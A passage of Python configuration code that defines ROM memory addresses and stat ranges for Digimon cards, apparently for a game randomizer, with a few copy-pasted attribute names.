max_value=Max_HP_Multiplier(2420,ice_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Vikemon Circle",
addresses=[0x2666308],
number_of_bytes=2,
min_value=Min_Circle_Multiplier(760,ice_special_modifier,ultimate_modifier),
max_value=Max_Circle_Multiplier(760,ice_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Vikemon Triangle",
addresses=[0x2666324],
number_of_bytes=2,
min_value=Min_Triangle_Multiplier(570,ice_special_modifier,ultimate_modifier),
max_value=Max_Triangle_Multiplier(570,ice_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Vikemon Cross",
addresses=[0x2666340],
number_of_bytes=2,
min_value=Min_Cross_Multiplier(390,ice_special_modifier,ultimate_modifier,2),
max_value=Max_Cross_Multiplier(390,ice_special_modifier,ultimate_modifier,2),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Vikemon Cross Effect",
addresses=[0x26663cc],
number_of_bytes=1,
possible_values = cross_special_effect,
is_little_endian=True,),
#Omnimon II 035
Attribute(
name="Omnimon II Element",
addresses=[0x266643e],
number_of_bytes=1,
min_value=Get_Element_Type(16, 3, 35),
max_value=Get_Element_Type(16, 3, 35),
is_little_endian=True, ),
Attribute(
name="Omnimon II +DP",
addresses=[0x2666440],
number_of_bytes=2,
possible_values=Ten_DP_Change,
is_little_endian=True,),
Attribute(
name="Omnimon II HP",
addresses=[0x2666442],
number_of_bytes=2,
min_value=Min_HP_Multiplier(2420,ice_special_modifier,ultimate_modifier),
max_value=Max_HP_Multiplier(2420,ice_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Omnimon II Circle",
addresses=[0x2666444],
number_of_bytes=2,
min_value=Min_Circle_Multiplier(550,ice_special_modifier,ultimate_modifier),
max_value=Max_Circle_Multiplier(550,ice_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Omnimon II Triangle",
addresses=[0x2666460],
number_of_bytes=2,
min_value=Min_Triangle_Multiplier(800,ice_special_modifier,ultimate_modifier),
max_value=Max_Triangle_Multiplier(800,ice_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Omnimon II Cross",
addresses=[0x266647c],
number_of_bytes=2,
min_value=Min_Cross_Multiplier(0,ice_special_modifier,ultimate_modifier,7),
max_value=Max_Cross_Multiplier(0,ice_special_modifier,ultimate_modifier,7),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Omnimon II Cross Effect",
addresses=[0x2666508],
number_of_bytes=1,
possible_values = cross_special_effect,
is_little_endian=True,),
#MetalSeadramon 036
Attribute(
name="MetalSeadramon Element",
addresses=[0x266657a],
number_of_bytes=1,
min_value=Get_Element_Type(16, 3, 36),
max_value=Get_Element_Type(16, 3, 36),
is_little_endian=True, ),
Attribute(
name="MetalSeadramon +DP",
addresses=[0x266657c],
number_of_bytes=2,
possible_values=Twenty_DP_Change,
is_little_endian=True,),
Attribute(
name="MetalSeadramon HP",
addresses=[0x266657e],
number_of_bytes=2,
min_value=Min_HP_Multiplier(2030,ice_special_modifier,ultimate_modifier),
max_value=Max_HP_Multiplier(2030,ice_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="MetalSeadramon Circle",
addresses=[0x2666580],
number_of_bytes=2,
min_value=Min_Circle_Multiplier(700,ice_special_modifier,ultimate_modifier),
max_value=Max_Circle_Multiplier(700,ice_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="MetalSeadramon Triangle",
addresses=[0x266659c],
number_of_bytes=2,
min_value=Min_Triangle_Multiplier(450,ice_special_modifier,ultimate_modifier),
max_value=Max_Triangle_Multiplier(450,ice_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="MetalSeadramon Cross",
addresses=[0x26665b8],
number_of_bytes=2,
min_value=Min_Cross_Multiplier(400,ice_special_modifier,ultimate_modifier,11),
max_value=Max_Cross_Multiplier(400,ice_special_modifier,ultimate_modifier,11),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="MetalSeadramon Cross Effect",
addresses=[0x2666644],
number_of_bytes=1,
possible_values = cross_special_effect,
is_little_endian=True,),
#MetalGarurumon 037
Attribute(
name="MetalGarurumon Element",
addresses=[0x26666b6],
number_of_bytes=1,
min_value=Get_Element_Type(16, 3, 37),
max_value=Get_Element_Type(16, 3, 37),
is_little_endian=True, ),
Attribute(
name="MetalGarurumon +DP",
addresses=[0x26666b8],
number_of_bytes=2,
possible_values=Twenty_DP_Change,
is_little_endian=True,),
Attribute(
name="MetalGarurumon HP",
addresses=[0x26666ba],
number_of_bytes=2,
min_value=Min_HP_Multiplier(2250,ice_special_modifier,ultimate_modifier),
max_value=Max_HP_Multiplier(2250,ice_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="MetalGarurumon Circle",
addresses=[0x26666bc],
number_of_bytes=2,
min_value=Min_Circle_Multiplier(700,ice_special_modifier,ultimate_modifier),
max_value=Max_Circle_Multiplier(700,ice_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="MetalGarurumon Triangle",
addresses=[0x26666d8],
number_of_bytes=2,
min_value=Min_Triangle_Multiplier(450,ice_special_modifier,ultimate_modifier),
max_value=Max_Triangle_Multiplier(450,ice_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="MetalGarurumon Cross",
addresses=[0x26666f4],
number_of_bytes=2,
min_value=Min_Cross_Multiplier(400,ice_special_modifier,ultimate_modifier,11),
max_value=Max_Cross_Multiplier(400,ice_special_modifier,ultimate_modifier,11),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="MetalGarurumon Cross Effect",
addresses=[0x2666780],
number_of_bytes=1,
possible_values = cross_special_effect,
is_little_endian=True,),
#MarineAngemon 038
Attribute(
name="MarineAngemon Element",
addresses=[0x26667f2],
number_of_bytes=1,
min_value=Get_Element_Type(16, 3, 38),
max_value=Get_Element_Type(16, 3, 38),
is_little_endian=True, ),
Attribute(
name="MarineAngemon +DP",
addresses=[0x26667f4],
number_of_bytes=2,
possible_values=Twenty_DP_Change,
is_little_endian=True,),
Attribute(
name="MarineAngemon HP",
addresses=[0x26667f6],
number_of_bytes=2,
min_value=Min_HP_Multiplier(1540,ice_special_modifier,ultimate_modifier),
max_value=Max_HP_Multiplier(1540,ice_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="MarineAngemon Circle",
addresses=[0x26667f8],
number_of_bytes=2,
min_value=Min_Circle_Multiplier(630,ice_special_modifier,ultimate_modifier),
max_value=Max_Circle_Multiplier(630,ice_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="MarineAngemon Triangle",
addresses=[0x2666814],
number_of_bytes=2,
min_value=Min_Triangle_Multiplier(480,ice_special_modifier,ultimate_modifier),
max_value=Max_Triangle_Multiplier(480,ice_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="MarineAngemon Cross",
addresses=[0x2666830],
number_of_bytes=2,
min_value=Min_Cross_Multiplier(220,ice_special_modifier,ultimate_modifier,2),
max_value=Max_Cross_Multiplier(220,ice_special_modifier,ultimate_modifier,2),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="MarineAngemon Cross Effect",
addresses=[0x26668bc],
number_of_bytes=1,
possible_values = cross_special_effect,
is_little_endian=True,),
#WereGarurumon 039
Attribute(
name="WereGarurumon Element",
addresses=[0x2666a5e],
number_of_bytes=1,
min_value=Get_Element_Type(16, 3, 39),
max_value=Get_Element_Type(16, 3, 39),
is_little_endian=True, ),
Attribute(
name="WereGarurumon +DP",
addresses=[0x2666a60],
number_of_bytes=2,
possible_values=Twenty_DP_Change,
is_little_endian=True,),
Attribute(
name="WereGarurumon HP",
addresses=[0x2666a62],
number_of_bytes=2,
min_value=Min_HP_Multiplier(1820,ice_special_modifier,ultimate_modifier),
max_value=Max_HP_Multiplier(1820,ice_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="WereGarurumon Circle",
addresses=[0x2666a64],
number_of_bytes=2,
min_value=Min_Circle_Multiplier(670,ice_special_modifier,ultimate_modifier),
max_value=Max_Circle_Multiplier(670,ice_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="WereGarurumon Triangle",
addresses=[0x2666a80],
number_of_bytes=2,
min_value=Min_Triangle_Multiplier(500,ice_special_modifier,ultimate_modifier),
max_value=Max_Triangle_Multiplier(500,ice_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="WereGarurumon Cross",
addresses=[0x2666a9c],
number_of_bytes=2,
min_value=Min_Cross_Multiplier(0,ice_special_modifier,ultimate_modifier,6),
max_value=Max_Cross_Multiplier(0,ice_special_modifier,ultimate_modifier,6),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="WereGarurumon Cross Effect",
addresses=[0x2666b28],
number_of_bytes=1,
possible_values = cross_special_effect,
is_little_endian=True,),
#Zudomon 040
Attribute(
name="Zudomon Element",
addresses=[0x2666b9a],
number_of_bytes=1,
min_value=Get_Element_Type(16, 3, 40),
max_value=Get_Element_Type(16, 3, 40),
is_little_endian=True, ),
Attribute(
name="Zudomon +DP",
addresses=[0x2666b9c],
number_of_bytes=2,
possible_values=Twenty_DP_Change,
is_little_endian=True,),
Attribute(
name="Zudomon HP",
addresses=[0x2666b9e],
number_of_bytes=2,
min_value=Min_HP_Multiplier(2090,ice_special_modifier,ultimate_modifier),
max_value=Max_HP_Multiplier(2090,ice_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Zudomon Circle",
addresses=[0x2666ba0],
number_of_bytes=2,
min_value=Min_Circle_Multiplier(700,ice_special_modifier,ultimate_modifier),
max_value=Max_Circle_Multiplier(700,ice_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Zudomon Triangle",
addresses=[0x2666bbc],
number_of_bytes=2,
min_value=Min_Triangle_Multiplier(300,ice_special_modifier,ultimate_modifier),
max_value=Max_Triangle_Multiplier(300,ice_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Zudomon Cross",
addresses=[0x2666bd8],
number_of_bytes=2,
min_value=Min_Cross_Multiplier(250,ice_special_modifier,ultimate_modifier,2),
max_value=Max_Cross_Multiplier(250,ice_special_modifier,ultimate_modifier,2),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Zudomon Cross Effect",
addresses=[0x2666c64],
number_of_bytes=1,
possible_values = cross_special_effect,
is_little_endian=True,),
#Panjyamon 041
Attribute(
name="Panjyamon Element",
addresses=[0x2666cd6],
number_of_bytes=1,
min_value=Get_Element_Type(16, 3, 41),
max_value=Get_Element_Type(16, 3, 41),
is_little_endian=True, ),
Attribute(
name="Panjyamon +DP",
addresses=[0x2666cd8],
number_of_bytes=2,
possible_values=Twenty_DP_Change,
is_little_endian=True,),
Attribute(
name="Panjyamon HP",
addresses=[0x2666cda],
number_of_bytes=2,
min_value=Min_HP_Multiplier(1800,ice_special_modifier,ultimate_modifier),
max_value=Max_HP_Multiplier(1800,ice_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Panjyamon Circle",
addresses=[0x2666cdc],
number_of_bytes=2,
min_value=Min_Circle_Multiplier(620,ice_special_modifier,ultimate_modifier),
max_value=Max_Circle_Multiplier(620,ice_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Panjyamon Triangle",
addresses=[0x2666cf8],
number_of_bytes=2,
min_value=Min_Triangle_Multiplier(390,ice_special_modifier,ultimate_modifier),
max_value=Max_Triangle_Multiplier(390,ice_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Panjyamon Cross",
addresses=[0x2666d14],
number_of_bytes=2,
min_value=Min_Cross_Multiplier(0,ice_special_modifier,ultimate_modifier,6),
max_value=Max_Cross_Multiplier(0,ice_special_modifier,ultimate_modifier,6),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Panjyamon Cross Effect",
addresses=[0x2666da0],
number_of_bytes=1,
possible_values = cross_special_effect,
is_little_endian=True,),
#MegaSeadramon 042
Attribute(
name="MegaSeadramon Element",
addresses=[0x2666e12],
number_of_bytes=1,
min_value=Get_Element_Type(16, 3, 42),
max_value=Get_Element_Type(16, 3, 42),
is_little_endian=True, ),
Attribute(
name="MegaSeadramon +DP",
addresses=[0x2666e14],
number_of_bytes=2,
possible_values=Twenty_DP_Change,
is_little_endian=True,),
Attribute(
name="MegaSeadramon HP",
addresses=[0x2666e16],
number_of_bytes=2,
min_value=Min_HP_Multiplier(1870,ice_special_modifier,ultimate_modifier),
max_value=Max_HP_Multiplier(1870,ice_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="MegaSeadramon Circle",
addresses=[0x2666e18],
number_of_bytes=2,
min_value=Min_Circle_Multiplier(650,ice_special_modifier,ultimate_modifier),
max_value=Max_Circle_Multiplier(650,ice_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="MegaSeadramon Triangle",
addresses=[0x2666e34],
number_of_bytes=2,
min_value=Min_Triangle_Multiplier(360,ice_special_modifier,ultimate_modifier),
max_value=Max_Triangle_Multiplier(360,ice_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="MegaSeadramon Cross",
addresses=[0x2666e50],
number_of_bytes=2,
min_value=Min_Cross_Multiplier(0,ice_special_modifier,ultimate_modifier,5),
max_value=Max_Cross_Multiplier(0,ice_special_modifier,ultimate_modifier,5),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="MegaSeadramon Cross Effect",
addresses=[0x2666edc],
number_of_bytes=1,
possible_values = cross_special_effect,
is_little_endian=True,),
#WaruSeadramon 043
Attribute(
name="WaruSeadramon Element",
addresses=[0x2666f4e],
number_of_bytes=1,
min_value=Get_Element_Type(16, 3, 43),
max_value=Get_Element_Type(16, 3, 43),
is_little_endian=True, ),
Attribute(
name="WaruSeadramon +DP",
addresses=[0x2666f50],
number_of_bytes=2,
possible_values=Ten_DP_Change,
is_little_endian=True,),
Attribute(
name="WaruSeadramon HP",
addresses=[0x2666f52],
number_of_bytes=2,
min_value=Min_HP_Multiplier(1760,ice_special_modifier,ultimate_modifier),
max_value=Max_HP_Multiplier(1760,ice_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="WaruSeadramon Circle",
addresses=[0x2666f54],
number_of_bytes=2,
min_value=Min_Circle_Multiplier(650,ice_special_modifier,ultimate_modifier),
max_value=Max_Circle_Multiplier(650,ice_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="WaruSeadramon Triangle",
addresses=[0x2666f70],
number_of_bytes=2,
min_value=Min_Triangle_Multiplier(360,ice_special_modifier,ultimate_modifier),
max_value=Max_Triangle_Multiplier(360,ice_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="WaruSeadramon Cross",
addresses=[0x2666f8c],
number_of_bytes=2,
min_value=Min_Cross_Multiplier(200,ice_special_modifier,ultimate_modifier,10),
max_value=Max_Cross_Multiplier(200,ice_special_modifier,ultimate_modifier,10),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="WaruSeadramon Cross Effect",
addresses=[0x2667018],
number_of_bytes=1,
possible_values = cross_special_effect,
is_little_endian=True,),
#Brachiomon 044
Attribute(
name="Brachiomon Element",
addresses=[0x266708a],
number_of_bytes=1,
min_value=Get_Element_Type(16, 3, 44),
max_value=Get_Element_Type(16, 3, 44),
is_little_endian=True, ),
Attribute(
name="Brachiomon +DP",
addresses=[0x266708c],
number_of_bytes=2,
possible_values=Twenty_DP_Change,
is_little_endian=True,),
Attribute(
name="Brachiomon HP",
addresses=[0x266708e],
number_of_bytes=2,
min_value=Min_HP_Multiplier(2300,ice_special_modifier,ultimate_modifier),
max_value=Max_HP_Multiplier(2300,ice_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Brachiomon Circle",
addresses=[0x2667090],
number_of_bytes=2,
min_value=Min_Circle_Multiplier(600,ice_special_modifier,ultimate_modifier),
max_value=Max_Circle_Multiplier(600,ice_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Brachiomon Triangle",
addresses=[0x26670ac],
number_of_bytes=2,
min_value=Min_Triangle_Multiplier(380,ice_special_modifier,ultimate_modifier),
max_value=Max_Triangle_Multiplier(380,ice_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Brachiomon Cross",
addresses=[0x26670c8],
number_of_bytes=2,
min_value=Min_Cross_Multiplier(150,ice_special_modifier,ultimate_modifier,2),
max_value=Max_Cross_Multiplier(150,ice_special_modifier,ultimate_modifier,2),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Brachiomon Cross Effect",
addresses=[0x2667154],
number_of_bytes=1,
possible_values = cross_special_effect,
is_little_endian=True,),
#BlueMeramon 045
Attribute(
name="BlueMeramon Element",
addresses=[0x26671c6],
number_of_bytes=1,
min_value=Get_Element_Type(16, 3, 45),
max_value=Get_Element_Type(16, 3, 45),
is_little_endian=True, ),
Attribute(
name="BlueMeramon +DP",
addresses=[0x26671c8],
number_of_bytes=2,
possible_values=Ten_DP_Change,
is_little_endian=True,),
Attribute(
name="BlueMeramon HP",
addresses=[0x26671ca],
number_of_bytes=2,
min_value=Min_HP_Multiplier(1430,ice_special_modifier,ultimate_modifier),
max_value=Max_HP_Multiplier(1430,ice_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="BlueMeramon Circle",
addresses=[0x26671cc],
number_of_bytes=2,
min_value=Min_Circle_Multiplier(700,ice_special_modifier,ultimate_modifier),
max_value=Max_Circle_Multiplier(700,ice_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="BlueMeramon Triangle",
addresses=[0x26671e8],
number_of_bytes=2,
min_value=Min_Triangle_Multiplier(480,ice_special_modifier,ultimate_modifier),
max_value=Max_Triangle_Multiplier(480,ice_special_modifier,ultimate_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="BlueMeramon Cross",
addresses=[0x2667204],
number_of_bytes=2,
min_value=Min_Cross_Multiplier(360,ice_special_modifier,ultimate_modifier,4),
max_value=Max_Cross_Multiplier(360,ice_special_modifier,ultimate_modifier,4),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="BlueMeramon Cross Effect",
addresses=[0x2667290],
number_of_bytes=1,
possible_values = cross_special_effect,
is_little_endian=True,),
#Garurumon 046
Attribute(
name="Garurumon Element",
addresses=[0x2667432],
number_of_bytes=1,
min_value=Get_Element_Type(16, 2, 46),
max_value=Get_Element_Type(16, 2, 46),
is_little_endian=True, ),
Attribute(
name="Garurumon +DP",
addresses=[0x2667434],
number_of_bytes=2,
possible_values=Ten_DP_Change,
is_little_endian=True,),
Attribute(
name="Garurumon HP",
addresses=[0x2667436],
number_of_bytes=2,
min_value=Min_HP_Multiplier(1100,ice_special_modifier,champion_modifier),
max_value=Max_HP_Multiplier(1100,ice_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Garurumon Circle",
addresses=[0x2667438],
number_of_bytes=2,
min_value=Min_Circle_Multiplier(350,ice_special_modifier,champion_modifier),
max_value=Max_Circle_Multiplier(350,ice_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Garurumon Triangle",
addresses=[0x2667454],
number_of_bytes=2,
min_value=Min_Triangle_Multiplier(230,ice_special_modifier,champion_modifier),
max_value=Max_Triangle_Multiplier(230,ice_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Garurumon Cross",
addresses=[0x2667470],
number_of_bytes=2,
min_value=Min_Cross_Multiplier(0,ice_special_modifier,champion_modifier,5),
max_value=Max_Cross_Multiplier(0,ice_special_modifier,champion_modifier,5),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Garurumon Cross Effect",
addresses=[0x26674fc],
number_of_bytes=1,
possible_values = cross_special_effect,
is_little_endian=True,),
#Ikkakumon 047
Attribute(
name="Garurumon Element",
addresses=[0x266756e],
number_of_bytes=1,
min_value=Get_Element_Type(16, 2, 47),
max_value=Get_Element_Type(16, 2, 47),
is_little_endian=True, ),
Attribute(
name="Ikkakumon +DP",
addresses=[0x2667570],
number_of_bytes=2,
possible_values=Twenty_DP_Change,
is_little_endian=True,),
Attribute(
name="Ikkakumon HP",
addresses=[0x2667572],
number_of_bytes=2,
min_value=Min_HP_Multiplier(1200,ice_special_modifier,champion_modifier),
max_value=Max_HP_Multiplier(1200,ice_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Ikkakumon Circle",
addresses=[0x2667574],
number_of_bytes=2,
min_value=Min_Circle_Multiplier(340,ice_special_modifier,champion_modifier),
max_value=Max_Circle_Multiplier(340,ice_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Ikkakumon Triangle",
addresses=[0x2667590],
number_of_bytes=2,
min_value=Min_Triangle_Multiplier(250,ice_special_modifier,champion_modifier),
max_value=Max_Triangle_Multiplier(250,ice_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Ikkakumon Cross",
addresses=[0x26675ac],
number_of_bytes=2,
min_value=Min_Cross_Multiplier(200,ice_special_modifier,champion_modifier,11),
max_value=Max_Cross_Multiplier(200,ice_special_modifier,champion_modifier,11),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Ikkakumon Cross Effect",
addresses=[0x2667638],
number_of_bytes=1,
possible_values = cross_special_effect,
is_little_endian=True,),
#Dolphmon 048
Attribute(
name="Garurumon Element",
addresses=[0x26676aa],
number_of_bytes=1,
min_value=Get_Element_Type(16, 2, 48),
max_value=Get_Element_Type(16, 2, 48),
is_little_endian=True, ),
Attribute(
name="Dolphmon +DP",
addresses=[0x26676ac],
number_of_bytes=2,
possible_values=Twenty_DP_Change,
is_little_endian=True,),
Attribute(
name="Dolphmon HP",
addresses=[0x26676ae],
number_of_bytes=2,
min_value=Min_HP_Multiplier(1000,ice_special_modifier,champion_modifier),
max_value=Max_HP_Multiplier(1000,ice_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Dolphmon Circle",
addresses=[0x26676b0],
number_of_bytes=2,
min_value=Min_Circle_Multiplier(330,ice_special_modifier,champion_modifier),
max_value=Max_Circle_Multiplier(330,ice_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Dolphmon Triangle",
addresses=[0x26676cc],
number_of_bytes=2,
min_value=Min_Triangle_Multiplier(290,ice_special_modifier,champion_modifier),
max_value=Max_Triangle_Multiplier(290,ice_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Dolphmon Cross",
addresses=[0x26676e8],
number_of_bytes=2,
min_value=Min_Cross_Multiplier(200,ice_special_modifier,champion_modifier,4),
max_value=Max_Cross_Multiplier(200,ice_special_modifier,champion_modifier,4),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Dolphmon Cross Effect",
addresses=[0x2667774],
number_of_bytes=1,
possible_values = cross_special_effect,
is_little_endian=True,),
#Whamon 049
Attribute(
name="Garurumon Element",
addresses=[0x26677e6],
number_of_bytes=1,
min_value=Get_Element_Type(16, 2, 49),
max_value=Get_Element_Type(16, 2, 49),
is_little_endian=True, ),
Attribute(
name="Whamon +DP",
addresses=[0x26677e8],
number_of_bytes=2,
possible_values=Twenty_DP_Change,
is_little_endian=True,),
Attribute(
name="Whamon HP",
addresses=[0x26677ea],
number_of_bytes=2,
min_value=Min_HP_Multiplier(1300,ice_special_modifier,champion_modifier),
max_value=Max_HP_Multiplier(1300,ice_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Whamon Circle",
addresses=[0x26677ec],
number_of_bytes=2,
min_value=Min_Circle_Multiplier(340,ice_special_modifier,champion_modifier),
max_value=Max_Circle_Multiplier(340,ice_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="<NAME>",
addresses=[0x2667808],
number_of_bytes=2,
min_value=Min_Triangle_Multiplier(220,ice_special_modifier,champion_modifier),
max_value=Max_Triangle_Multiplier(220,ice_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="<NAME>",
addresses=[0x2667824],
number_of_bytes=2,
min_value=Min_Cross_Multiplier(150,ice_special_modifier,champion_modifier,3),
max_value=Max_Cross_Multiplier(150,ice_special_modifier,champion_modifier,3),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="<NAME> Effect",
addresses=[0x26678b0],
number_of_bytes=1,
possible_values = cross_special_effect,
is_little_endian=True,),
#Seadramon 050
Attribute(
name="Seadramon Element",
addresses=[0x2667922],
number_of_bytes=1,
min_value=Get_Element_Type(16, 2, 50),
max_value=Get_Element_Type(16, 2, 50),
is_little_endian=True, ),
Attribute(
name="Seadramon +DP",
addresses=[0x2667924],
number_of_bytes=2,
possible_values=Twenty_DP_Change,
is_little_endian=True,),
Attribute(
name="Seadramon HP",
addresses=[0x2667926],
number_of_bytes=2,
min_value=Min_HP_Multiplier(1150,ice_special_modifier,champion_modifier),
max_value=Max_HP_Multiplier(1150,ice_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Seadramon Circle",
addresses=[0x2667928],
number_of_bytes=2,
min_value=Min_Circle_Multiplier(360,ice_special_modifier,champion_modifier),
max_value=Max_Circle_Multiplier(360,ice_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Seadramon Triangle",
addresses=[0x2667944],
number_of_bytes=2,
min_value=Min_Triangle_Multiplier(250,ice_special_modifier,champion_modifier),
max_value=Max_Triangle_Multiplier(250,ice_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Seadramon Cross",
addresses=[0x2667960],
number_of_bytes=2,
min_value=Min_Cross_Multiplier(100,ice_special_modifier,champion_modifier,2),
max_value=Max_Cross_Multiplier(100,ice_special_modifier,champion_modifier,2),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Seadramon Cross Effect",
addresses=[0x26679ec],
number_of_bytes=1,
possible_values = cross_special_effect,
is_little_endian=True,),
#Gesomon 051
Attribute(
name="Gesomon Element",
addresses=[0x2667a5e],
number_of_bytes=1,
min_value=Get_Element_Type(16, 2, 51),
max_value=Get_Element_Type(16, 2, 51),
is_little_endian=True, ),
Attribute(
name="Gesomon +DP",
addresses=[0x2667a60],
number_of_bytes=2,
possible_values=Ten_DP_Change,
is_little_endian=True,),
Attribute(
name="Gesomon HP",
addresses=[0x2667a62],
number_of_bytes=2,
min_value=Min_HP_Multiplier(1030,ice_special_modifier,champion_modifier),
max_value=Max_HP_Multiplier(1030,ice_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Gesomon Circle",
addresses=[0x2667a64],
number_of_bytes=2,
min_value=Min_Circle_Multiplier(400,ice_special_modifier,champion_modifier),
max_value=Max_Circle_Multiplier(400,ice_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Gesomon Triangle",
addresses=[0x2667a80],
number_of_bytes=2,
min_value=Min_Triangle_Multiplier(250,ice_special_modifier,champion_modifier),
max_value=Max_Triangle_Multiplier(250,ice_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Gesomon Cross",
addresses=[0x2667a9c],
number_of_bytes=2,
min_value=Min_Cross_Multiplier(160,ice_special_modifier,champion_modifier,2),
max_value=Max_Cross_Multiplier(160,ice_special_modifier,champion_modifier,2),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Gesomon Cross Effect",
addresses=[0x2667b28],
number_of_bytes=1,
possible_values = cross_special_effect,
is_little_endian=True,),
#Frigimon 052
Attribute(
name="Frigimon Element",
addresses=[0x2667cca],
number_of_bytes=1,
min_value=Get_Element_Type(16, 2, 52),
max_value=Get_Element_Type(16, 2, 52),
is_little_endian=True, ),
Attribute(
name="Frigimon +DP",
addresses=[0x2667ccc],
number_of_bytes=2,
possible_values=Twenty_DP_Change,
is_little_endian=True,),
Attribute(
name="Frigimon HP",
addresses=[0x2667cce],
number_of_bytes=2,
min_value=Min_HP_Multiplier(990,ice_special_modifier,champion_modifier),
max_value=Max_HP_Multiplier(990,ice_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Frigimon Circle",
addresses=[0x2667cd0],
number_of_bytes=2,
min_value=Min_Circle_Multiplier(350,ice_special_modifier,champion_modifier),
max_value=Max_Circle_Multiplier(350,ice_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Frigimon Triangle",
addresses=[0x2667cec],
number_of_bytes=2,
min_value=Min_Triangle_Multiplier(200,ice_special_modifier,champion_modifier),
max_value=Max_Triangle_Multiplier(200,ice_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="<NAME>",
addresses=[0x2667d08],
number_of_bytes=2,
min_value=Min_Cross_Multiplier(170,ice_special_modifier,champion_modifier,11),
